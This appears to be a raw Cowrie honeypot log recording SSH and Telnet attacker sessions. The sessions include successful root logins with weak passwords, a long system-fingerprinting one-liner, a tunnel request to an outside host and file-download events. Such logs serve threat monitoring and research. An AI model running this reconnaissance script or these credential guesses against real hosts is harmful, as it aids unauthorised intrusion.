{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-09-08T19:21:17.132474Z","src_ip":"212.227.235.229","session":"5daba8b9a37b"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:21:17.132967Z","src_ip":"212.227.235.229","session":"5daba8b9a37b"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:21:17.133464Z","src_ip":"212.227.235.229","session":"5daba8b9a37b"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:21:17.134194Z","src_ip":"212.227.235.229","session":"5daba8b9a37b"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:21:17.134763Z","src_ip":"212.227.235.229","session":"5daba8b9a37b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-09-08T19:21:17.433938Z","src_ip":"212.227.235.229","session":"5daba8b9a37b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","size":74,"shasum":"d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:21:17.435591Z","src_ip":"212.227.235.229","session":"5daba8b9a37b"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:21:17.436425Z","src_ip":"212.227.235.229","session":"5daba8b9a37b"}
{"eventid":"cowrie.login.success","username":"root","password":"welcome","message":"login attempt [root/welcome] succeeded","sensor":"my-vps","timestamp":"2025-09-08T19:21:18.155280Z","src_ip":"212.227.125.160","session":"31cdc5131b66"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:21:19.062898Z","src_ip":"212.227.125.160","session":"31cdc5131b66"}
{"eventid":"cowrie.command.input","input":"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","message":"CMD: export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","sensor":"my-vps","timestamp":"2025-09-08T19:21:19.063752Z","src_ip":"212.227.125.160","session":"31cdc5131b66"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:21:19.064745Z","src_ip":"212.227.125.160","session":"31cdc5131b66"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:21:19.066367Z","src_ip":"212.227.125.160","session":"31cdc5131b66"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-09-08T19:21:19.067975Z","src_ip":"212.227.125.160","session":"31cdc5131b66"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:21:19.069029Z","src_ip":"212.227.125.160","session":"31cdc5131b66"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:21:19.070209Z","src_ip":"212.227.125.160","session":"31cdc5131b66"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-09-08T19:21:19.071776Z","src_ip":"212.227.125.160","session":"31cdc5131b66"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-09-08T19:21:19.072593Z","src_ip":"212.227.125.160","session":"31cdc5131b66"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:21:19.073363Z","src_ip":"212.227.125.160","session":"31cdc5131b66"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:21:19.074137Z","src_ip":"212.227.125.160","session":"31cdc5131b66"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:21:19.075010Z","src_ip":"212.227.125.160","session":"31cdc5131b66"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:21:19.075979Z","src_ip":"212.227.125.160","session":"31cdc5131b66"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-09-08T19:21:19.427638Z","src_ip":"212.227.125.160","session":"31cdc5131b66"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","size":74,"shasum":"d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:21:19.428885Z","src_ip":"212.227.125.160","session":"31cdc5131b66"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:21:19.430103Z","src_ip":"212.227.125.160","session":"31cdc5131b66"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56132,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca7ecd5293d4","protocol":"ssh","message":"New connection: 212.227.125.160:56132 (1.2.3.4:22) [session: ca7ecd5293d4]","sensor":"my-vps","timestamp":"2025-09-08T19:21:38.425524Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:21:38.426756Z","src_ip":"212.227.125.160","session":"ca7ecd5293d4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56407,"dst_ip":"1.2.3.4","dst_port":22,"session":"84076bd7c522","protocol":"ssh","message":"New connection: 212.227.125.160:56407 (1.2.3.4:22) [session: 84076bd7c522]","sensor":"my-vps","timestamp":"2025-09-08T19:21:38.536941Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T19:21:38.538711Z","src_ip":"212.227.125.160","session":"84076bd7c522"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-08T19:21:38.651796Z","src_ip":"212.227.125.160","session":"84076bd7c522"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-08T19:21:38.993689Z","src_ip":"212.227.125.160","session":"84076bd7c522"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-08T19:21:39.107622Z","session":"84076bd7c522"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:22:01.073011Z","src_ip":"79.124.8.120","session":"eb0dd18ab64f"}
{"eventid":"cowrie.session.closed","duration":180.08487367630005,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:22:01.077853Z","src_ip":"79.124.8.120","session":"eb0dd18ab64f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60669,"dst_ip":"1.2.3.4","dst_port":23,"session":"f2d3bcaf988c","protocol":"telnet","message":"New connection: 212.227.235.229:60669 (1.2.3.4:23) [session: f2d3bcaf988c]","sensor":"my-vps","timestamp":"2025-09-08T19:22:25.159167Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48722,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ddf02eb204f","protocol":"ssh","message":"New connection: 212.227.235.229:48722 (1.2.3.4:22) [session: 7ddf02eb204f]","sensor":"my-vps","timestamp":"2025-09-08T19:22:37.739884Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T19:22:37.838851Z","src_ip":"212.227.235.229","session":"7ddf02eb204f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T19:22:38.031070Z","src_ip":"212.227.235.229","session":"7ddf02eb204f"}
{"eventid":"cowrie.session.closed","duration":12.914032936096191,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:22:38.073133Z","src_ip":"212.227.235.229","session":"f2d3bcaf988c"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssw0rd","message":"login attempt [root/P@ssw0rd] succeeded","sensor":"my-vps","timestamp":"2025-09-08T19:22:39.293150Z","src_ip":"212.227.235.229","session":"7ddf02eb204f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33168,"dst_ip":"1.2.3.4","dst_port":22,"session":"f8dc4a2c0299","protocol":"ssh","message":"New connection: 212.227.125.160:33168 (1.2.3.4:22) [session: f8dc4a2c0299]","sensor":"my-vps","timestamp":"2025-09-08T19:22:39.304296Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T19:22:39.305480Z","src_ip":"212.227.125.160","session":"f8dc4a2c0299"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T19:22:39.620867Z","src_ip":"212.227.125.160","session":"f8dc4a2c0299"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:22:39.884551Z","src_ip":"212.227.235.229","session":"7ddf02eb204f"}
{"eventid":"cowrie.command.input","input":"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","message":"CMD: export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","sensor":"my-vps","timestamp":"2025-09-08T19:22:39.885238Z","src_ip":"212.227.235.229","session":"7ddf02eb204f"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:22:39.885755Z","src_ip":"212.227.235.229","session":"7ddf02eb204f"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:22:39.886756Z","src_ip":"212.227.235.229","session":"7ddf02eb204f"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-09-08T19:22:39.888193Z","src_ip":"212.227.235.229","session":"7ddf02eb204f"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:22:39.888834Z","src_ip":"212.227.235.229","session":"7ddf02eb204f"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:22:39.889497Z","src_ip":"212.227.235.229","session":"7ddf02eb204f"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-09-08T19:22:39.890931Z","src_ip":"212.227.235.229","session":"7ddf02eb204f"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-09-08T19:22:39.891406Z","src_ip":"212.227.235.229","session":"7ddf02eb204f"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:22:39.891916Z","src_ip":"212.227.235.229","session":"7ddf02eb204f"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:22:39.892486Z","src_ip":"212.227.235.229","session":"7ddf02eb204f"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:22:39.893180Z","src_ip":"212.227.235.229","session":"7ddf02eb204f"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:22:39.894347Z","src_ip":"212.227.235.229","session":"7ddf02eb204f"}
